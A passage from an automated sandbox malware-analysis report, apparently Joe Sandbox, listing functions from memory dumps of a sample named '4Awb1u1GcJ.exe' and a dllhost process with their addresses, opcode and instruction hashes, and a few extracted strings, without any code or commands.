Instruction ID: 99f30100d0a69f74a40d3b932bf6d84d5929f5ef6c04f8d45f351ee6bf97a71e
Opcode Fuzzy Hash: 74dcef4b419b7f5ce9045f6751ccad1737382c3c68d56c516673f8cdaeeeba65
Instruction Fuzzy Hash: DF215E30A1964D8FEBA8DB58C8A9AEC73F1FF58310F5541B9D00DD32A2DE746A848B01

Function 00007FFD9BAE299B Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f2734984db7e4a78afadbd70b70330b7300ea6953082eb61e9a342eada7a57
Instruction ID: bc4d49a9aec34ad02fe2f8f345288b10c6bc92809f082034a0f0e082f140c155
Opcode Fuzzy Hash: 21f2734984db7e4a78afadbd70b70330b7300ea6953082eb61e9a342eada7a57
Instruction Fuzzy Hash: 5F11A231B0DB4D4FEBB8EB98C8B1AB87392EB98350F050279D40DC72A6CE646D458781

Function 00007FFD9BAD6EE1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bad3000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef2339b56463ab43407bf9661a40446f0d7d9882e9f9b293a51f6ce5eda2d9b
Instruction ID: 9471484c96ad37131d762b009075a99bde0e3b3aad565894cd1cf79fb2d7ac2f
Opcode Fuzzy Hash: 2ef2339b56463ab43407bf9661a40446f0d7d9882e9f9b293a51f6ce5eda2d9b
Instruction Fuzzy Hash: 4F01D622B0FA4A0FE361939D98A02B43B91EBE9360F4643B3D049C71A2EC5D99864381

Function 00007FFD9BAE47B0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8622b619f792bd3a543182dfc99fde4bc8344f38d9296f55bf5a22812c4212d
Instruction ID: 2233ef4bfb2f0b9d798395a92a2349d858101d6ef4d245eb7d0fe86419e9bf17
Opcode Fuzzy Hash: e8622b619f792bd3a543182dfc99fde4bc8344f38d9296f55bf5a22812c4212d
Instruction Fuzzy Hash: C9118E30E19A1E8BEB68DF58D46167D73E1EB98704F11447DE40EC32A1CE74A9418BC0

Function 00007FFD9BAE4EC1 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35ed97de61e5976614bcad164077a4f9d7d80c9782a230abae6708b76cf18c6
Instruction ID: fb2f51929a40a7f28e27312649c7229dc3873ed51c50a89e2f0834072bc057fc
Opcode Fuzzy Hash: f35ed97de61e5976614bcad164077a4f9d7d80c9782a230abae6708b76cf18c6
Instruction Fuzzy Hash: CA112530F0DA1A8FEB68DB18946567C37E1EB94708F2144BED00EC32A2CE749D028B80

Function 00007FFD9BAE7398 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7f582d195ef438eb9afa0faf1cc48ddbcfaddffe977f4df7ab7951db4fb2bf5
Instruction ID: 6d3eaa19926772b777c40cebc88b1f3094c7a0f23601a5063457825d81e7a6ea
Opcode Fuzzy Hash: b7f582d195ef438eb9afa0faf1cc48ddbcfaddffe977f4df7ab7951db4fb2bf5
Instruction Fuzzy Hash: 6C01F216B091524AE319F27CA8B58E87790DF5523F70886B3E19D8D0E7E809A885C685

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction ID: e6cc52103f3fcc46451140b0274cda5c6eedec88cbdb288fe29f0a3a54887733
Opcode Fuzzy Hash: eea93e84d60fef8a6471b174b2bc24e6b883aeea52c0e8c4e5cadf5acf51056c
Instruction Fuzzy Hash: E7112531B0D25C8FE722EBA888601EC7FB0EF52310F0640B3C054DB2A2EA7456058B80

Function 00007FFD9BAED70E Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1c6ea5391c34fc90dcf796b95a728f07882299f9d0c3c81534948449e3caa8
Instruction ID: bec6a626b83b01e22859330834b80cdbd5b11cb7fbdf2c18b7020e51acf46028
Opcode Fuzzy Hash: 4b1c6ea5391c34fc90dcf796b95a728f07882299f9d0c3c81534948449e3caa8
Instruction Fuzzy Hash: DF019E32F095094BEB64D78898903FC73E2EF88325F160576D41DE3191DAB86E418780

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction ID: d164d74f3963f671a9d399346b4e7a96b5cc4e9f08b7ed05a62762d34d9ca2da
Opcode Fuzzy Hash: ef131cb522a5a37f39e31dc9e769a1449aa4da52ae05c791b4ea1e719949e20e
Instruction Fuzzy Hash: D401D631A0D29C8FE722DBA8C8601DD7FB0EF52310F1541F7D054DB2A2DA7456458B80

Function 00007FFD9BAEB17A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967534dd71896707fa783157a27e2e19fdbc2fda0789796caa05d0c33537e881
Instruction ID: e0b3b3dce814a083b635c098adc67642ba85cf49af809fbfab9d4f00d645ac26
Opcode Fuzzy Hash: 967534dd71896707fa783157a27e2e19fdbc2fda0789796caa05d0c33537e881
Instruction Fuzzy Hash: 37F0CD22B0A90E5FEB94EB9CA4EA7F873D1FB98321F810177E40CC31A2CE6468854341

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction ID: 20802f59bde97c301dd5e9b345a6f363c5aac8770f02b3ef939c2b8106521135
Opcode Fuzzy Hash: bef31c10d4458536d21acf654e4190cda8b47d0bef1a805d7ed44298c28e51f0
Instruction Fuzzy Hash: 1801B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541E7D054DB2A2EA746644CB80

Function 00007FFD9BAE284E Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90207c214e18bacab50e3dd5ff9790a49da59a2817637de7dabadae431f85bd
Instruction ID: a439997a684fa7bde9f93e4a801a1c620ae7467c2e884467acc89d525431542c
Opcode Fuzzy Hash: d90207c214e18bacab50e3dd5ff9790a49da59a2817637de7dabadae431f85bd
Instruction Fuzzy Hash: 4DF04431B0DA1D8FE768EB84C4646E83392EB98360F154276D419D72D5DD6869828781

Function 00007FFD9BAB6355 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a576f917b5205070a54c56812b954bc3be6e2c23b4a0fcb79f411c1bbf671d
Instruction ID: e0e2966051760506565c475e4ef3ab9b0a98cc173168eb1de063832637a01dda
Opcode Fuzzy Hash: 80a576f917b5205070a54c56812b954bc3be6e2c23b4a0fcb79f411c1bbf671d
Instruction Fuzzy Hash: 0BF0E131648A188FCF98DF48C499EE973B1FBA8301F514199D44AD72A1DA74EAC4CF41

Function 00007FFD9BAEAE09 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 979a6ce6d6cb1f59308647d420a7491f5188ecb2df365e03cdd1517d15c5cf8f
Instruction ID: 91170a82fcc3a9e5c9d2d4dd727839f183b9de6cb624cf808e25fbaa1fcb404c
Opcode Fuzzy Hash: 979a6ce6d6cb1f59308647d420a7491f5188ecb2df365e03cdd1517d15c5cf8f
Instruction Fuzzy Hash: 76F0E521B1CBC80FC72A562958A50617FE1CB5B10134A01FFC496CB2A3ED58AC868741

Function 00007FFD9BAB0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a61abf18ef1c1919838c8767c2072e8d82e8c37b56fa1fe068a0f146d247f6
Instruction ID: d418cbdb07abc47635a8f2156b71ccc6ed6e5a661542e719f7b0d209bb921151
Opcode Fuzzy Hash: 88a61abf18ef1c1919838c8767c2072e8d82e8c37b56fa1fe068a0f146d247f6
Instruction Fuzzy Hash: E5F0E53525D659CFC781DB7CC8A44C5BBA0FF07224B4505EED089CB5A2D321686DCB41

Function 00007FFD9BAC4625 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc6676477d521dfa641edde4d1ab00835e25049738eb695cbe5d6e84844d78d
Instruction ID: 427630241112099fd0287994d7e1d36e0c48f04e1371625b2b655577e0d6fe78
Opcode Fuzzy Hash: abc6676477d521dfa641edde4d1ab00835e25049738eb695cbe5d6e84844d78d
Instruction Fuzzy Hash: 03F0E171A0551E8BEB58AF84C8699FD77B1FB54315F00063DD415E73F5DF786A008684

Function 00007FFD9BAE7E69 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41d9c9d6cf136a57e9a3064b594dcbfd8f5cf898970cac15edfae06ea7e40dd
Instruction ID: 17704cf8083a5fc01e2f9c610c86f28b0cd87ef17d22178b0884332428152b24
Opcode Fuzzy Hash: c41d9c9d6cf136a57e9a3064b594dcbfd8f5cf898970cac15edfae06ea7e40dd
Instruction Fuzzy Hash: B7E04F2194F7C04FCB4B9B3588A88447F71EE2721074A51EAC045CF5B3EA1D9C4AC712

Function 00007FFD9BAE7EB5 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction ID: bc609456c48afe17a99a836dbd44cd4213e808e441cb26f9586ea2d6b2dcb0ae
Opcode Fuzzy Hash: ae81d5ac95bd8c5fff8a6cd2c358f58440a4ece3e35b295da8582a4b7a9ac074
Instruction Fuzzy Hash: C3E0C222B0BA490FD71D57388C7D8603BA0DF6621274A00A6D089CB1B2D955DD498302

Function 00007FFD9BAEA9F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAEA960 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAEDA09 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd8f9725ad66c7ad0fb16bf7ee3e93111b0d50c9f42477c9a33b024190476b5
Instruction ID: 0d478dd234a12840d08de9bad55dce72f6492ac0557d30405ee10a661254f31d
Opcode Fuzzy Hash: afd8f9725ad66c7ad0fb16bf7ee3e93111b0d50c9f42477c9a33b024190476b5
Instruction Fuzzy Hash: A9E0462194E7C44FC70B9B3088A88943F609E2B21078A80EFC085CF2B3EA298849C702

Function 00007FFD9BAED989 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e689fd49f99f0597acfde2e6e0d3ce873ed7201c8551e3a3856d87cb7d7173
Instruction ID: 8653c833ce6969302e47ff345abd559f35e115d9f89ddea2ed028158e997a871
Opcode Fuzzy Hash: c2e689fd49f99f0597acfde2e6e0d3ce873ed7201c8551e3a3856d87cb7d7173
Instruction Fuzzy Hash: 62E01A2194F7C04FC70B9B3588699447F609E2721074A40EFC085CF5B3E9298849C712

Function 00007FFD9BAB3C50 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction ID: 603bec44fd0a14084be405ccafd15459f321dc49df9fa70c445e0d7c55e1444e
Opcode Fuzzy Hash: b71154f6811b1a46ea1c637581da84ea4721a7384894732eb20529ecdb6f447d
Instruction Fuzzy Hash: 33E01220F1913E4BF774AB94C8603BA6191AF94300F1200B9D51DA32E2DDB86E818F44

Function 00007FFD9BAE9449 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14829e0cb105ee8d11e6ad1d02fd0f4ace460c5d298b9d773908629549d5320
Instruction ID: 4f1a09b716865c9737101c73354ade0971d3ccd631709a0be14be77b391cca83
Opcode Fuzzy Hash: e14829e0cb105ee8d11e6ad1d02fd0f4ace460c5d298b9d773908629549d5320
Instruction Fuzzy Hash: EFE0123054D6844FC70A9B34C8A99903FB0EF67215B8A01D7C045CB5B3D61D9C49C751

Function 00007FFD9BAE2170 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAEBC08 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction ID: 7e9f0635ee626ed270a1b0dd52f30db4e1c5ac1181242ce1d3e56ff1c3d03a17
Opcode Fuzzy Hash: da2cb6c2cafa6b5f5edab449d0f7cf26ebb55178732f044562998e539d326a31
Instruction Fuzzy Hash: 23D02230B508040FC70CBB388C588343390EB6A2027C100A8D00ACB2B5D96ADC88C741

Function 00007FFD9BAE73E8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bae1000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: d05df94c20911b878a8769cbe63ec2ce94efe51993079f40d22b77b40fbb7cdf
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: 93D01235B519044FC71CA738989D8747391EB6A21679540A9D00AC72B1D96ADD89CB41

Function 00007FFD9BAC4EAB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bac0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction ID: 49a7f575056c7a69c9ec9aed29604974be0198e72e31d262c8ee69d81674c5c1
Opcode Fuzzy Hash: 695cd6d037c7fdd18f4dad062843dc6fc43e3be44e1d5119e0169c718fa4a6fc
Instruction Fuzzy Hash: 4BD05B31B1D51EC7FAB4FB9854602F96260AF44304F120478D41D831F7CE696F025689

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction ID: e5d351356e2d5641432ef330e74628a354c33c02fb27340905700f44cac165af
Opcode Fuzzy Hash: 97a2d7dcafa2939c2f895590cec35bdfa7002fe09993c838be268cc9ca0f9451
Instruction Fuzzy Hash: C3C00205F5B52E01E43573AB54660ACA1409BD5A10FD70176D529900A198DD22D5095A

Function 00007FFD9BAB05D5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction ID: b1e87a13519ebbfe8bb18a621cb3bba385a2b548f07e6c5e4e69379d8009ece4
Opcode Fuzzy Hash: 530b2e4cba479226e548c664b9f99a967a9c48153231c63fb52f0da919f78608
Instruction Fuzzy Hash: ECB09231EABA1E81DA3933B588620687150AB45204FE602B5D429801A1E8EF56D74A42

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction ID: 8496adba37a8fc4f0301b980a15ec7fd161aeee609ba40c3e87c639e8d89e795
Opcode Fuzzy Hash: 6bee5cc9e94fd31349c2e8f327b20a06cbde244c229506f29f4827323b7dc03b
Instruction Fuzzy Hash: 6EB01200D5741F01E43433FB089206870409B44100FC300B0D41E900A198CD13D40646

Non-executed Functions

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 189COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAB0B46
#{9, xrefs: 00007FFD9BAB0B3E
!k9, xrefs: 00007FFD9BAB0B4E
c9, xrefs: 00007FFD9BAB0B56

Memory Dump Source

Source File: 00000036.00000002.2757791548.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_54_2_7ffd9bab0000_dllhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction ID: adfb4375f6f4ac5f4da22a464742b246a025fa1b39eefa7662677e7b1c5d80c8
Opcode Fuzzy Hash: f2bdf695bce83e0d59e6a7cfeec1ae3ecc66448e446e38bc8ff99103df93bada
Instruction Fuzzy Hash: 31518E06B0957646E23973FD78219E9AB449FA927FB0847B7F56E8D0C74C486081C3E9

Analysis Process: 4Awb1u1GcJ.exePID: 1076, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAD0B3F Relevance: 3.0, Strings: 1, Instructions: 1754COMMON

Download Yara Rule

Strings

W_L, xrefs: 00007FFD9BAD19D4

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bad0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID: W_L
API String ID: 0-1698909037
Opcode ID: 6b727eed98534d69b9124e9a754b16dd0ca1ff83be9af81766a011841167941f
Instruction ID: 53af50fbadb35ce04297cedf10220a600d4ce333d2020a5f661ea72b6363aab1
Opcode Fuzzy Hash: 6b727eed98534d69b9124e9a754b16dd0ca1ff83be9af81766a011841167941f
Instruction Fuzzy Hash: 72C2D531B1991E4FEBA9EB5884A16B87392FFE8344F1142B9D01DC32E6DE78BD458740

Function 00007FFD9BAF14E5 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9baf1000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825aa5bb83b362159bc50c6f9cd0f9f200f8d5b56a2e348e82f745748e0db799
Instruction ID: 48b15e02153d39439b94950b7ad08435035ebb8b5ec7714c237b7b6853515319
Opcode Fuzzy Hash: 825aa5bb83b362159bc50c6f9cd0f9f200f8d5b56a2e348e82f745748e0db799
Instruction Fuzzy Hash: DFC1AE21F2E78A0BE32D4A584C920F57BD5EBA2319B19867DD4DBC3097DA78E50782C1

Function 00007FFD9BAC0D77 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9bac0000_4Awb1u1GcJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd052143dd21c1500ed96e6be9457fbe6ffb4188d3c2ec9b0cf8d03dcb9b9d17
Instruction ID: a27cdb381dd75e390a9ec0939d93bc5f3b53071411bc11616b9971d340220f25
Opcode Fuzzy Hash: dd052143dd21c1500ed96e6be9457fbe6ffb4188d3c2ec9b0cf8d03dcb9b9d17
Instruction Fuzzy Hash: 1191D271A19A8D8FE75AEB6C88657A87FE2FF99314F0002FAD059D72D6CFB814108740

Function 00007FFD9BAEAC9C Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

E, xrefs: 00007FFD9BAEC043

Memory Dump Source

Source File: 00000037.00000002.2922466285.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false

Joe Sandbox IDA Plugin

